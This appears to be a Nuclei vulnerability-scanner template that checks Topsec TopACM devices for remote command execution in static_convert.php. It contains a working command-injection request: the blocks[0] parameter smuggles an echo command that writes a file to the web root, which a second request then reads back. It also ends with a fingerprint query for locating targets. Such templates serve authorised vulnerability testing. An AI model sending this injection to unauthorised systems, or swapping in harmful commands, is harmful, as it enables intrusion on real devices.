nuclei-templates/http/vulnerabilities/topsec/topsec-topacm-rce.yaml

id: topsec-topacm-rce

info:
  name: topsec topacm remote code execution
  author: SleepingBag945
  severity: critical
  description: 天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java
    - https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md
  tags: rce,topsec,topacm

http:
  - raw:
      - |
        GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

  - raw:
      - |
        GET /config_application.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200


# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top"